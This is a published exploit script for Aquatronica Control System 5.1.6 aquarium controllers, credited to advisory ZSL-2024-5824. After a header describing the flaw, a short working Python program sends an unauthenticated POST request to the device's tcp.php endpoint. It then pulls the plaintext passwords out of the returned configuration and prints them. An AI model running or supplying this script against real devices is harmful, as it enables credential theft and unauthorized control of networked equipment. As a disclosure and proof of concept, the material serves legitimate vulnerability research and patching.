Aquatronica Control System 5.1.6 - Information Disclosure

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3. #
4. #
5. # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
6. #
7. #
8. # Vendor: Aquatronica s.r.l.
9. # Product web page: https://www.aquatronica.com
10. # Affected version: Firmware: 5.1.6
11. #                   Web: 2.0
12. #
13. # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
14. # to use, allowing you to control all the electrical devices in
15. # an aquarium and to monitor all their parameters; it can be used
16. # for soft water aquariums, salt water aquariums or both simultaneously.
17. #
18. # Desc: The tcp.php endpoint on the Aquatronica controller is exposed
19. # to unauthenticated attackers over the network. This vulnerability
20. # allows remote attackers to send a POST request which can reveal
21. # sensitive configuration information, including plaintext passwords.
22. # This can lead to unauthorized access and control over the aquarium
23. # controller, compromising its security and potentially allowing attackers
24. # to manipulate its settings.
25. #
26. # Tested on: Apache/2.0.54 (Unix)
27. #            PHP/5.4.17
28. #
29. #
30. # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
31. #                             @zeroscience
32. #
33. #
34. # Advisory ID: ZSL-2024-5824
35. # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
36. #
37. #
38. # 04.05.2024
39. #
40.  
41. import requests, html, re, sys, time
42. from urllib.parse import unquote
43.  
44. program     = "TCP"
45. command     = "ws_get_network_cfg"
46. function_id = "TCP_XML_REQUEST"
47.  
48. print("""
49.      _________         .    .
50.     (..       \_    ,  |\ /|
51.      \      O  \ /|  \ \/ /
52.       \______    \/ |   \ /
53.          vvvv\   \ |   /  |
54.          \^^^^  ==   \_/   |
55.           `\_   ===    \.  |
56.           / /\_   \ /      |
57.           |/   \_  \|      /
58. ___ ______________\________/________aquatronica_0day___
59.  | |
60.  | |
61.  | |
62. """)
63.  
64. if len(sys.argv) != 2:
65.     print("Usage: python aqua.py <ip:port>")
66.     sys.exit(1)
67.  
68. ip = sys.argv[1]
69. url = f"http://{ip}/{program.lower()}.php"
70.  
71. post_data = {'function_id' : function_id.lower(),
72.              'command'     :     command.upper()}
73.  
74. r = requests.post(url, data=post_data)
75.  
76. if r.status_code == 200:
77.     r_d = unquote(r.text)
78.     f_d_r = html.unescape(r_d)
79.     regex = r'pwd="([^"]+)"'
80.     rain = re.findall(regex, f_d_r)
81.  
82.     for drops in rain:
83.         print(' ',drops)
84.         time.sleep(0.5)
85. else:
86.     print(f"Dry season! {r.status_code}")
87.